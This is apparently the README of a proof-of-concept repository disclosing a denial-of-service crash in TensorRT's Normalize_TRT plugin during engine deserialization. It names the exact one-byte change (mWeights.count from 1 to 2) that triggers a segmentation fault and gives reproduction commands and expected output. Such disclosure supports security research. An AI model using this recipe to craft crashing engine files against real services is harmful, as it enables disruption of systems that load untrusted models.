| --- |
| license: other |
| tags: |
| - security |
| - tensorrt |
| - model-format-vulnerability |
| - poc |
| --- |
| |
| # TensorRT Normalize_TRT Deserialization DoS PoC |
| |
| This repository contains a TensorRT `.engine` proof-of-concept for a model file deserialization crash in the built-in `Normalize_TRT` plugin. |
|
|
| The malformed engine differs from the valid control engine by one byte: the serialized `Normalize_TRT` `mWeights.count` field is changed from `1` to `2`. When standard TensorRT plugins are registered and the malformed engine is loaded, TensorRT reaches `Normalize::Normalize(void const* buffer, size_t length)`, logs a failed length validation at `normalizePlugin.cpp:80`, and then the process exits with `SIGSEGV`. |
|
|
| ## Files |
|
|
| - `normalize_malformed_count.engine`: malformed PoC engine. |
| - `normalize_valid_control.engine`: valid control engine built from the same network. |
| - `reproduce.py`: minimal loader that initializes standard TensorRT plugins and deserializes the engine. |
| - `requirements.txt`: Python package version used during local validation. |
|
|
| ## Reproduction |
|
|
| Tested with TensorRT `10.16.1.11`. |
|
|
| ```bash |
| python3 -m venv venv |
| ./venv/bin/python -m pip install -r requirements.txt |
| ./venv/bin/python reproduce.py normalize_valid_control.engine |
| ./venv/bin/python reproduce.py normalize_malformed_count.engine |
| ``` |
|
|
| Expected behavior: |
|
|
| ```text |
| $ ./venv/bin/python reproduce.py normalize_valid_control.engine |
| engine_host_code_allowed=False |
| loaded=True |
| |
| $ ./venv/bin/python reproduce.py normalize_malformed_count.engine |
| engine_host_code_allowed=False |
| [TRT] [F] Validation failed: d == a + length |
| /_src/plugin/normalizePlugin/normalizePlugin.cpp:80 |
| [TRT] [E] std::exception |
| Segmentation fault |
| ``` |
|
|
| The crash requires the standard TensorRT plugin registry to be initialized. Without plugin initialization, TensorRT fails cleanly because it cannot find `Normalize_TRT`: |
|
|
| ```bash |
| ./venv/bin/python reproduce.py --no-init-plugins normalize_malformed_count.engine |
| ``` |
|
|
| Expected clean failure: |
|
|
| ```text |
| engine_host_code_allowed=False |
| [TRT] [E] ... Cannot find plugin: Normalize_TRT, version: 1 ... |
| loaded=False |
| ``` |
|
|
| ## Hashes |
|
|
| ```text |
| 82157f8a49985e3cd942381c54bdc1dd05b8d369bbb2faef6fd0f619c5b31e97 normalize_valid_control.engine |
| 0c528c8f9f3a471ffb47208499f4b00ebc5cbc17f72667785726e89135cb4694 normalize_malformed_count.engine |
| ``` |
|
|
| ## Scope |
|
|
| This PoC demonstrates reliable denial of service during TensorRT engine deserialization. It does not demonstrate arbitrary code execution. |
|
|
